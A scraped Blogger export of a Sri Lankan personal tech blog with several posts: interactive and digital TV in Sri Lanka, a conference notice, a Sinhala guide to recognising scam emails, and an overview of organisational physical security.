Expect commercials to pop up in games, on-line services, and programs
and anywhere you don't seem to mind seeing them.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l5 level1 lfo6; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">·<span style="font: normal normal normal 7pt/normal 'Times New Roman';">
</span></span><span style="font-size: 12pt; line-height: 115%;">Branding - product logos and product
related images will be placed on the screen when and wherever they are most
effective.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l5 level1 lfo6; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">·<span style="font: normal normal normal 7pt/normal 'Times New Roman';">
</span></span><span style="font-size: 12pt; line-height: 115%;">Tools - A wide variety of online
services will be offered by interactive TV.
Email, personal diaries, financial planners, chat rooms and so on. Expect them to be products in their own
right, with special versions for boys, girls, working women, teenagers, retired
men, etc. Which are offered, how they
operate, and how they are tied to other products will all be open for
targeting.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l5 level1 lfo6; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">·<span style="font: normal normal normal 7pt/normal 'Times New Roman';">
</span></span><span style="font-size: 12pt; line-height: 115%;">Games - Aside from children's video
games, many services and entertainments will feature 3-D environments where
viewers can to walk, run, jump or lie around.
What games are offered and what viewers encounter.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l5 level1 lfo6; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">·<span style="font: normal normal normal 7pt/normal 'Times New Roman';">
</span></span><span style="font-size: 12pt; line-height: 115%;">Forums and Chat <o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l5 level1 lfo6; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">·<span style="font: normal normal normal 7pt/normal 'Times New Roman';">
</span></span><span style="font-size: 12pt; line-height: 115%;">Clubs and Organizations<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l5 level1 lfo6; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">·<span style="font: normal normal normal 7pt/normal 'Times New Roman';">
</span></span><span style="font-size: 12pt; line-height: 115%;">Online Transactions - Shopping and
banking through your television will be entirely customized to (or targeted at)
viewer. What viewer is offered, how much it costs and how much
you pay will all change from person to person. You will be offered exclusive
discounts and special offers.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">In this way not only the viewer but so many can
partiers can benefit from interactive televisions.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<b><u><span style="font-family: Arial, Helvetica, sans-serif; font-size: 16pt; line-height: 115%;">Digital
and Interactive Television in Sri Lanka</span></u></b></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">There are so many number of DTV channels in Sri
Lanka but still majority of population is using analog TV stations. Existing
Sri Lankan digital television channels are based on ADSL and Satellite. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">“<i>Sri Lanka
will end analog radio and television broadcasting system but plans to introduce
digital radio and television transmission system to provide a better reception
for the local listeners and Television viewers.<o:p></o:p></i></span></div>
<div class="MsoNormal">
<i><span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">The
Sri-Lankan terrestrial broadcasting system will be fully converted to digital
by 2017 according to Daily News quotes, from the Mass Media and Information
Minister Keheliya Rambukwella.<o:p></o:p></span></i></div>
<div class="MsoNormal">
<i><span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">He
told a briefing in Colombo that he has appointed a committee to look into the
technical aspects and evaluation of the digitalisation project and that it will
be headed by Mass Media and Information Ministry Secretary W B Ganegala. He
went on to say that the conversion process will begin in 2011 and because
digital technology had the capacity to transmit several channels using a single
frequency, obstacles to the expansion of broadcasting facilities could be
removed, he said.<o:p></o:p></span></i></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span style="font-size: 12pt; line-height: 115%;">Sri
Lanka will use the DVB-T2 digital standard. The first region to have the
service will be the country’s Western Province which includes the capital,
Colombo</span></i><span style="font-size: 12pt; line-height: 115%;">.”<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibsKSjdJaV-O1C3Y-r50Z6ORrhxbpZjhTHeLoQlOC3Jf796XOLA_HdO_pgpEgn4ZbtQ3m-BXL58paJccAxK7ALPN3DGTmXtrCY11szjV8ugsMf04UzUgwp-0rN5gIQjvwfkC4shzBoDnI/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibsKSjdJaV-O1C3Y-r50Z6ORrhxbpZjhTHeLoQlOC3Jf796XOLA_HdO_pgpEgn4ZbtQ3m-BXL58paJccAxK7ALPN3DGTmXtrCY11szjV8ugsMf04UzUgwp-0rN5gIQjvwfkC4shzBoDnI/s1600/11.jpg" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Still lot of television sets in Sri Lanka is analog
based and infrastructure in island wide is not enough yet. The digital
television can be easily implemented in Western and few other provinces but
when it goes more rural it becomes like impossible to implement digital
television. So in my point of view to go for digital television in Sri Lanka
facilitating the infrastructure is a key point. Unless with lesser number of
viewers broadcasters will not be able to introduce noew technologies to enhance
the television experience.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">When we talk about interactive television we can see
SLT IPTV is quite interactive. But still you can only interact with the
television set in this too. What you can do it pause, rewind and etc. So we
cannot call it a good stage in interactive television. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Sri Lankan major television stations are still
running on analog based systems. This is a major concern. As an example in SLRC
(Sri Lanka Rupavahini Corporation) uses analog systems and VCR tapes in
broadcasting. So television stations should adopt new technology in order to
facilitate digital television and interactive television<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">The number of IT literacy is increasing in Sri Lanka
so in some years after 2017 the knowledge will not be an obstacle to implement
interactive television in Sri Lanka.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">What we can see significantly in Sri Lanka is the
tax for these types of equipment are having high rates. With that peoples
buying ability for the equipment needed are low. This also affects the
transformation timeline to interactive television. So making this equipment
available for public is very important fact.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">So it’s obvious that Sri Lanka still at beginning
stages of the transformation in television from analog to digital. The
available digital television channels are also immature or Indian channels. We
can see there are no advance channels which are broadcasted only for Sri Lanka.
In India we can see that even discovery has a separate channel for India. Even
in Sri Lanka we watch that channel from digital televisions. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Government should fund television stations who wish
to transform into digital and government can give them exception in taxes
equipments they export. And the license fee for a television broadcaster is
very high if government can reduce it then television satiations can use that
amount of money also to span their capabilities. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">There are no proper education systems for television
based technologies in Sri Lanka. Majority of people we see in Sri Lankan
television stations are people with very lower educational background. They
have expertise the field by experience. But when they are lack of basics and
theories then it makes hard for them to adopt new technologies easily by
leaving old equipment that they have mastered. So creating a telecommunication
based task force with requires knowledge and skills is also needed to speed up
the transformation process.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-size: 12pt; line-height: 115%;"><span style="font-family: Arial, Helvetica, sans-serif;">When a country implements a system like television
in that particular country, They should look forward at least more than 25
years. Because once infrastructure is made it is not easy to change or replace.
We can see there are developed countries that still run on old technologies
because it is hard to change an infrastructure in entire country. So when Sri
Lanka implements these technologies they have to find the best technologies
which have a potential sustainability in future. </span><span style="font-family: 'Times New Roman', serif;"><o:p></o:p></span></span><br />
<i style="font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 18px;"><br /></i><br />
<i style="line-height: 18px;"><span style="font-family: Arial, Helvetica, sans-serif;">References:</span></i><br />
<ol>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18px;"><i>Wikipeadia</i></span></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18px;"><i>Lankapuvath National News Agency of Sri Lanka</i></span></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18px;"><i>Asia Pacific Broadcasting Union</i></span></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18px;"><i>Daily News Online</i></span></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18px;"><i>Asia-Pacific Institute for Broadcast Development</i></span></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18px;"><i>Sri Lanka’s Daily News</i></span></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18px;"><i>http://www.dvb.org/about_dvb/dvb_worldwide/sri_lanka/</i></span></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18px;"><i>http://www.lbn.lk/channels.html</i></span></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18px;"><i>http://www.asiantribune.com/news/2009/10/28/sri-lanka-will-end-analog-tv-and-radio-transmissions-plans-go-digital</i></span></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18px;"><i>http://broadcastengineering.com/mag/broadcasting_benefits_interactive_enhanced/</i></span></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18px;"><i>http://www.oiv.hr/media/formatting-packaging/interactive-tv/interactive-tv_en.aspx</i></span></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18px;"><i>http://www.sysmedia.com/solutions/interactive_solutions.asp?gclid=CJ7_yd2lw60CFQd66wodIUbiBQ</i></span></span></li>
</ol>
<br />
<div style="font-size: 12pt; line-height: 115%;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com6tag:blogger.com,1999:blog-7802132138133841506.post-27099729466696449982011-11-19T10:13:00.001-08:002011-11-19T10:26:11.508-08:00An Oppertunaty for Researchers in IT<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnD3PoOocJKCdpQQX5e2Rb1YsApVMWM_inYZJjgU027IKSMYM5aoubk5LaIBafTtmA4op1WNzwQT0bnVKqgz6qfkHVBjZnvgr2VYOaZUAzz9__RgN_Is96Xlf_KiInRWyWvR8wk54WPtE/s1600/banner.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 97px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnD3PoOocJKCdpQQX5e2Rb1YsApVMWM_inYZJjgU027IKSMYM5aoubk5LaIBafTtmA4op1WNzwQT0bnVKqgz6qfkHVBjZnvgr2VYOaZUAzz9__RgN_Is96Xlf_KiInRWyWvR8wk54WPtE/s400/banner.jpg" alt="" id="BLOGGER_PHOTO_ID_5676774642092981986" border="0" /></a><br />"World Academic – Industry Research Collaboration Center (WAIRCO) is a non-profit organisation that promotes basic sciences, science & engineering, and information technology research worldwide without any discrimination. It works as a bridge between the students, researchers and academicians of various disciplines and the experienced professionals from the industry through the series of activities such as workshops, seminars, symposiums, conferences and journals. WAIRCO depends on researchers, academicians and corporate support for bridging the academic gap by establishing the relationships with existing organizations and customizing relationships with standard bodies. <br /> <br />The main aim and objective of this organization is to promote new research and scientific applications in the field of several communities such as Computing and Information Technology, Electrical Engineering, Electronics Engineering etc. and allied fields. WAIRCO provides high quality and flexible information solutions to researchers. We currently publish international journals and conduct workshops and conferences all around the globe."<br /><br />Upper paragraphs in quotes taken from WAIRCO's offical website: <span style="color: rgb(102, 102, 204);">www.worldairco.org</span><br /><br />WAIRCO is hosting an international conference on computing and information technology. You can post your resaerch papers and get a chace to present your research infront of lot of researchers, intelectualls from all around the world. You can find more information about this event from <a href="http://www.worldairco.org/ICCIT%20July%202012/Callforpapers.html#">here</a>.Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-8613245514459132572011-10-20T08:35:00.000-07:002012-01-10T10:02:44.275-08:00බොරු Email?<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4SxY4Pf_cAcszBvt42qOeiCqlPGSn75UqGoAJMikvtXDi6mr3oErHbn_vDeqeUe_zXz3GNx7OlJs_6yDCWRCOUhnsKpjrLFZI-k0YUZ_v5GS-kI4_pCGrcT31OypgVbpOnF5iVS-YGW0/s1600/free-money.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 355px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4SxY4Pf_cAcszBvt42qOeiCqlPGSn75UqGoAJMikvtXDi6mr3oErHbn_vDeqeUe_zXz3GNx7OlJs_6yDCWRCOUhnsKpjrLFZI-k0YUZ_v5GS-kI4_pCGrcT31OypgVbpOnF5iVS-YGW0/s400/free-money.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5665617097618313762" /></a><br /><div style="text-align: left;">අපි හැමෝටම දවසකට විවිදාකාරයේ email පණිවුඩ ලැබෙනවා. යාලුවොන්ගෙන්, වැඩ කරන තැනින්, ඉගෙන ගන්න තැනින් හැරුනම වැඩියෙන්ම මේ වගේ දේවල් එන්නෙ අපි Register වෙලා ඉන්න විවිධාකාරයේ වෙබ් අඩවි වලින් (facebook එහෙම). ඒත් එක්කම මෙහෙම එන email වර්ගයක් තමයි Scam emails කියන්නෙ.</div><div><br /></div><div>Scam email කියන්නෙ. අපිව රවටල අපේ තොරතුරු ගන්න හෝ මුදල් ගන්න එන email වලට. මේවා එක එක ආකාරයෙන්, එක එක කතන්දර කිය කිය එන්න පුලුවන්. මේ Scam email අපිට මෙහෙම වර්ග කරන්න පුලුවන්. මම මේ වර්ගීකරණයන් ගත්තෙ මෙන්න මේ වෙබ් අඩවියෙන් <a href="http://www.scamwarners.com/">http://www.scamwarners.com/</a></div><div><ul><li>Fraudulent check scams - මේවයේ අපිට බොරු චෙක් පත් email විදිහට එනවා. </li><li>Fraudulent lotteries - මෙහිදී ඔබට ලොතරැයි දිනුමක් ලැබුනා යැයි පවසා තොරතුරු ගැනීම හෝ දිනුම ලබා ගැනීමට ගෙවීමක් කරන්න ලෙස කියා සිටිනවා.</li><li>Romance scams - මේකෙදි Scammer ඔබට කැමති බව හෝ වැනත් ආකාරයක රොමැන්ටික් දෙයක් කියනවා. </li><li>Money recovery scams - මේ email එක එන්නෙ කලින්ම වෙන බොරු email එකකට අහු උන කෙනෙක්ව තවත් ඉදිරියට ගෙනියන්න.</li><li>Charity scams - සමාජ සේවා ආයතන විදිහට මුදල් ඉල්ලා එන email. </li><li>Employment scams - බොරු රැකියා අවස්තා පෙන්නල එවන email. </li><li>Auction site and online selling scams - අන්තර්ජාලය හරහා ගනුදෙනු කරන අය (බඩු ගන්න/විකුණන අය) ඉලක්ක කරල එන email. </li><li>Rental scams - ඔබේ ණය හිමි හෝ ගෙවල් අයිතිකාරයෙක් විදිහට එවන email. </li><li>Debt collection scams - ඔබ කාට හරි, ආයතනයකට හරි ණයක් වෙලා තියෙනවානම් ඒ ණය වාරික ඔබෙන් රවටා අදාල ආයතනය හෝ පුද්ගලයා විදිහට ගන්න හදන email. </li><li>Advance fee loan scams - ණය දෙන්නො විදිහට පෙනී ඉදල ඔබව රවටන්නට තැත් දරන email.</li><li>Conference scams - බොරු සම්මන්ත්රණ සඳහා සහභාගී වෙන්න ඔබට ආරාධනා පත් එවන email. </li><li>Pet scams or puppy scams - මේකෙදි වෙන්නෙ ඔබට සුරතක් සතෙක් විකුණන හෝ දෙන මුවාවෙන් email එවන එක.</li><li>Fraudulent websites used in scams - Scammer විසින් හදපු වෙබ් අඩවියකට (මෙය ඔබේ බැංකුවේ වෙබ් අඩවියට සමානව හෝ ඔබ ගණුදෙණු කරන වෙනත් අඩවියකට සමානව සකස් වෙලා තියෙන්නෙ පුලුවන්) ඔබව navigate කරන සබැදි සහිතව email මෙහිදී එවනු ලබනවා.</li></ul></div>මේ විදිහට එන Scam email වැඩි වශයෙන් ඉලක්ක කරන්නෙ ඔබව රවටල මුදල් ගැනීම හෝ ඔබේ තොරතුරු (බැංකු ගිණුම් අංක වගේ) ලබා ගන්න. පසුව ඒවා වෙනත් ඔවුන්ට අවශ්ය දේවල් වලට යොදා ගන්නවා.<div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1xef6eUE2i25z3iw6tSU_7mSpGReaz5okbcTQH0A8KHj22tNCx9GMlSlRtI9RQsei_srEo5Pu_5_OrEgry432M2xz3MFMt6TQEm_lEtGneR2MCSgbBTdudPimgHWDNm5-zHu25QX8Buo/s1600/scam.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1xef6eUE2i25z3iw6tSU_7mSpGReaz5okbcTQH0A8KHj22tNCx9GMlSlRtI9RQsei_srEo5Pu_5_OrEgry432M2xz3MFMt6TQEm_lEtGneR2MCSgbBTdudPimgHWDNm5-zHu25QX8Buo/s400/scam.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5665617097727412498" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 239px; height: 211px; " /></a></div><div><div style="text-align: center;"><span class="Apple-style-span" ><u><br /></u></span></div><div>මෙහෙම Scammers ලා අපේ email ලිපින දැන ගන්නෙ කොහොමද? ඒකට විවිධ ආකාර තියෙන්න පුලුවන්. උදාහරණ විදිහට,</div><div><ul><li>අපි විවිධ වෙබ් අඩවි වල ලියා පදිචි වෙනවා විවිධ දේවල් වලට (බාගත කිරීම් කරන්න, ෆෝරම් කියවන්න වගේ) මේ අඩවි වලින් අපේ email ලිපින ඉල්ලනවා ලියාපදිංචිය සඳහා.</li><li>දම්වැල් email, ඒ කියන්නෙ විවිධ පණිවුඩ, පින්තූර අපි forward කර කර යවන email. මේ මඟිනුත් පුලුවන් email ලිපින ලබා ගන්න.</li></ul></div>මේ ආකාරයෙන් විවිධ ක්රම වලින් ලබා ගන්න එ මේල් තොග විදිහට වෙළද ප්රවර්ධන කරන අයට, Scammers ලාට වගේ අවශ්ය අයට විකුණනවා. මේ තියෙන්නෙ ඒ වගේ අඩවි දෙකක්,<div><ul><li><a href="http://www.email-point.com/">http://www.email-point.com/</a></li><li><a href="http://www.americaint.com/bulk-email-lists/buy-email-lists.html">http://www.americaint.com/bulk-email-lists/buy-email-lists.html</a></li></ul><div>මෙහෙම එන බොරු email එකක් වටහා ගන්නෙ කොහොමද?. ගොඩක් දුරට මේ වගේ email ඒවායේ තියෙන කතන්දරයෙම තේරුම ගන්න පුලුවන්. ගොඩක් දුරට මේ email එකක් එන්නෙ පුද්ගලයෙක් විදිහට. මට මේ ලඟදි ආපු email එකක් තමයි,</div></div><div><br /></div><div>Sane Timo කියන පුද්ගලයාගෙන් Timo.Sane@hus.fi කියන email ලිපිනයෙන් මට මොකක්දෝ දිනුමක් ලැබුනා කියල ආපු email එක. මම ඉතින් මෙයාගෙ Timo.Sane@hus.fi කියන email ලිපිනය කොපි කරල ගූගල් කරපු එක. මෙන්න එතකොට එනවා මේක ගැන අනතුරු ඇගවීම තියෙන Scam Warning වෙබ් අඩවි වල හා ෆෝරම් වල ලිපි. මෙන්න එකක් <a href="http://www.scamwarners.com/forum/viewtopic.php?f=12&t=25181&p=71301">http://www.scamwarners.com/forum/viewtopic.php?f=12&t=25181&p=71301</a></div><div><br /></div><div>මේ Scam Warning වෙබ් අඩවි කියන්නෙ මේ වගේ email හරහා එන විවිදාකාරයේ Scam ගැන පුද්ගලයො අනිත් අයට කියන වෙබ් අඩවි. බොරු email එකක් එකවර ලක්ෂ ගනනක email list වලට යන නිසා ඉක්මනින්ම මේ වගේ වෙබ් අඩවියක ඒක ගැන ඇත්ත කියල වෙබ් අඩවියක කුමක් හරි පල වෙනවා. ඒ නිසා මම යෝජනා කරන්නෙ මේ වගේ එකක් ආපුහාම ඒ ආපු email ලිපිනය සෙවුම් යන්ත්රයකින් (Search Engine such as google or yahoo) සොයන්න (Search). එතකොට ගොඩක් දුරට මේ ගැන ඇත්ත සොයා ගන්න පුලුවන්. ඒ වගේම මේ වගේ email එකක් කියෙව්වම තේරෙනවා මේ මොකක්ද කියල. නමුත් සමහර අය ඉතා දක්ෂ විදිහට සංවිධානය වෙලා තොරතුරු සහිතව එවන්නත් පුලුවන් ඒ නිසා හොයල බලන එක වැදගත්. මෙන්න අර කියපු වගේ Scam Warning වෙබ් අඩවි කීපයක්,</div><div><ul><li><a href="http://www.scamwarners.com/"><span class="Apple-style-span" >http://www.scamwarners.com/</span></a></li><li><a href="http://www.scam.com/"><span class="Apple-style-span" >http://www.scam.com/</span></a></li><li><a href="http://www.scamwatch.gov.au/"><span class="Apple-style-span" >http://www.scamwatch.gov.au</span></a></li><li><a href="http://www.fbi.gov/scams-safety/e-scams"><span class="Apple-style-span" >http://www.fbi.gov/scams-safety/e-scams</span></a></li><li><a href="http://www.scambusters.org/"><span class="Apple-style-span" >http://www.scambusters.org</span></a></li></ul></div></div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com2tag:blogger.com,1999:blog-7802132138133841506.post-12527388602873723882011-10-16T13:36:00.000-07:002011-10-16T13:42:04.191-07:00මයික්රොසොෆ්ට්ලාගේ අනාගත දැක්ම මෙන්න මෙහෙමයිලුමයික්රොසොෆ්ට් ආයතනය 2019 වෙනකොට තාක්ශණය කුමන ආකාරක් ගනියිද කියල වීඩියෝවකින් කියල තියෙනවා. මේ වීඩියෝව ඒ අය නිකුත් කරල දැන් ටිකක් කල් උනත් තාම 2019 උනේ නැති නිසා බලන්න වටිනවා.<div style="text-align: center;"><br /><div style="text-align: center;"><iframe width="560" height="315" src="http://www.youtube.com/embed/g9JBSEBu2q8" frameborder="0" allowfullscreen=""></iframe></div></div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-32409437711321609742011-10-16T12:45:00.000-07:002012-01-10T10:02:44.239-08:00Why Physical Security of an Organization is so Crucial?<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRLoj_sBpsG8Ae6mkqmQAqA0a4Ov7iiuRMx3vDKaGgtEgF7NGflJlxRIa0YCIpt7rOAi1fFLLdwBemruN5qKOaU0dGU2oDHdMBlVbk5ztgK5YZvJdrxAp3wkFUUdEWLwp7i-bi9ivQnC8/s1600/laptopthief2.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 288px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRLoj_sBpsG8Ae6mkqmQAqA0a4Ov7iiuRMx3vDKaGgtEgF7NGflJlxRIa0YCIpt7rOAi1fFLLdwBemruN5qKOaU0dGU2oDHdMBlVbk5ztgK5YZvJdrxAp3wkFUUdEWLwp7i-bi9ivQnC8/s400/laptopthief2.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5664184991554253698" /></a></div><br />Security of an organization very important and today organization take various actions to protect their information, assets and other important things. When looking at the security of an organization from a IT aspect, majority of people only consider about securing the organization using IT related solutions. They maybe add firewalls, make security policies, make better authentication systems...etc. When intruders find that organization is not vulnerable through networks or from other IT aspects they focus on physical vulnerabilities to accomplish their target.So if they only address the problem from such angle omitting the physical security fact of the organization, all other security precautions can be useless or will not give the outcome that they expected.<div><br /></div><div>Main objective of ensuring security in an organization is ensure that Confidentiality, Integrity and Availability (CIA) of information within the organization is achieved. As an example due to a natural disaster the information can be destroyed. Hence at that point clearly the availability of information is lost. Hence it is very important to assure the physical security of an organization.<br /><div><br /></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZWxoNwie8mQ6og_QYl5oSHv0WBWS0qGqW7fKUyyQGGS7Fkx7YozYFJnqdOkUVDThQk7N0ZrrvevVQabVbl6fB1xAnOGVolUU6AjXot3XyFGSbF6PDIUNwP-FZDEdCpJl7eTrYsXc9Fwc/s400/tsunami-disaster.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5664189257518433154" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 375px; height: 354px; " /></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><br /></span></div><div>Physical security has risks and vulnerabilities that are different than other security concerns we can find related to IT security of an organization. These include physical destruction of hardware, intruders, environmental issues, theft and vandalism.</div><div><br /></div><div>Physical threats can be divided into four categories broadly,</div><div><ul><li><b>Politically motivated threats</b>: Strikes, riots, civil disobedience, terrorist attacks, bombings...etc</li><li><b>Supply system threats</b>: Power distribution outages, communications interruptions, and interruption of other natural energy resources such as water, steam, gas, and so forth.</li><li><b>Natural environmental threats</b>: Floods, earth quacks, storms, tsunami and tornadoes, fires, extreme temperature conditions...etc</li><li><b>Manmade threats</b>: Unauthorized access internally and externally, explosions, damages by offensive employees, misuse, employee mistakes and accidents, vandalism, fraud, theft and so on. </li></ul><div>In these situations the primary consideration should be protecting human lives. Once life safety is achieved other concerns of information security can be addressed. </div></div></div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-31598660039296518362011-10-12T14:37:00.000-07:002012-01-10T10:02:44.233-08:00පරිඝනකයට එල්ල වන සතුරු උවදුරු හා අතුරු ආන්තරා<div style="text-align: left;">අපි හැකින් ගැන අහල තියෙනවා. හැමෝම වගේ වෛරස් ගාඩ් ගැන දන්නවා. වින්ඩෝස් වල නිතරම ෆයර්වෝල් ගැන එක එක ඒවා එනවා. මේ හැම දෙයක්ම පරිඝනකයේ ආරක්ශාව සම්බන්ද දේවල්. මොනවයින්ද පරිඝනකයක් මේ තරම් ආරක්ශා කරන්න ඕනි? ඒ හේතු ආකාර ගැන හැකි පමණ සරලව මේ ලිපියෙන් මම විස්තර කරන්නම්. මම වෙනත් ලිපියකින් පරිඝනකයක් ආරක්ෂා කරන්න ගන්න ඕනි ක්රියා මාර්ග ගැන කියන්න බලාපොරොත්තු වෙන නිසා මේ ලිපියෙන් කියන්නෙ උවදුරු හා ආන්තරා ගැන විතරයි.</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXkM76Xo3Wje3MStcMZ7C52uJYwFNlUVrq2y_DNnofhoN9rhZeMhQvbaHLz6jcOnHBJrTBrLPZv0_BauwmlgKt6gI-gxAkWmJ9O1JoHcLStyVyfLWxP5dd1geTHpKLfPZIrBYXRrqROIA/s1600/stealing-computer-5k1.gif" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXkM76Xo3Wje3MStcMZ7C52uJYwFNlUVrq2y_DNnofhoN9rhZeMhQvbaHLz6jcOnHBJrTBrLPZv0_BauwmlgKt6gI-gxAkWmJ9O1JoHcLStyVyfLWxP5dd1geTHpKLfPZIrBYXRrqROIA/s400/stealing-computer-5k1.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5662957468876446002" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 295px; height: 400px; " /></a></div><div><br /></div><div><br /></div><div>ප්රධාන වශයෙන් පරිඝනකයකට ප්රහාර හා උපද්රව එල්ල වෙන්නෙ අන්තර්ජාලය හරහා. නමුත් පරිඝනකයකට අන්තර්ජාලය නැතිව උනත් විවිද උපද්රව සිදු වෙන්න පුලුවන්. අපි පළමුවෙන්ම එහෙම අන්තර්ජාලය නැතිව වියහැකි අනතුරු 